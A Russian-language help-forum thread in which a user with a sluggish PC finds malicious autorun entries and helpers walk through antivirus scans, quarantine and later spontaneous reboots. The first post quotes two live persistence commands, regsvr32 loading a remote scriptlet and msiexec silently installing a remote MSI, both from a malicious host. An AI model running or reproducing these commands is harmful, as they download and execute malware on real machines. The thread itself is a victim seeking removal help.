Здравствуйте. На днях резко начал тормозить компьютер. Произошло это в том момент, когда я пользовался браузером. Проблема заключается в том, что все действия, выполняемые на компьютере “подвисают”, то есть, к примеру, окна открываются с задержкой, интернет-страницы так-же с задержкой перелистываются, все анимированные действия как-будто на 10 фпс. Поиск решения проблемы привел меня к тому, что в автозапуске я обнаружил 2 файла: regsvr 32 /u /s/ i:http://js.mykings.top:280/v.sct scrobj.dll и msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q. Оба файла, судя по информации с других форумов маскируются под программы Microsoft (подписаны как start и start1). Такого же рода проблема описана в топике 201822 ( Topic: Заражение Win32:Rootkit-gen [Rtk] ). Из антивирусов у меня установлен только какой-то cezurity (не помню даже когда и как его скачал), который обнаружил пару других троянов. Из информации с форумов этот вирус по всей видимости новый, и пока что не отслеживается/удаляется антивирусами. Подскажите, пожалуйста, что делать в данной ситуации?
Доброго времени суток! Выполнил проверку программой Malvarebytes, обнаруженные угрозы поместил в карантин, компьютер перезагрузил и визуально, описанная мною ранее проблема исчезла. Хочу уточнить, остальные пункты выполнять, или уже не стоит?
По идее да. Это необходимо для нашего хелпера Андрея_Про. А он уже как придёт, проверит Ваши логи.
Извините за задержку, прикрепляю отчеты по сканированию оставшимися двумя программами.
А антивирус аваст вы ставили? Сканировали авастом компьютер?
Нет. Просканировал лишь теми программами, которые были указаны в инструкции.
Ну тогда Авастом пробуйте сканировать и удалять
Здравствуйте. Я писал здесь по поводу вируса. После того, как я установил программу Malvarebytes вирусы были помещены в карантин. Спустя 2 недели программа выбила, что истекает срок действия ознакомительной версии. Я заглянул туда и обнаружил, что помещенные ранее в карантин там же и остались, хотя я слышал, что антивирусы должны со “лечить” файлы в карантине либо самостоятельно удалять их. В общем, я удалил все файлы в карантине (за исключением реестров) и, через некоторое время компьютер начал сам перезагружаться. Это происходит раз в день (всего 2 раза за последние два дня). Я подумал, что возможно это может быть связано с тем, что я удалил находящиеся в карантине файлы. Скажите, пожалуйста, это действительно связанно именно с этим?
Совпадение, ваш ПК стал бы самопроизвольно перезагружаться еще после установки и первого использования Malvarebytes. Лучше вспоминайте чего такого совсем недавно сделали, что могло спровоцировать возникновение ошибок и самоперезагрузку ПК.
Я посмотрел в журнале событий: там перед перезагрузкой ПК выбивает ряд ошибок. Примечательно то, что перезагрузка ПК происходила в одно и то же время (19:20). Недавно ничего такого явного, что могло бы привести к сбоям в системе, не совершал.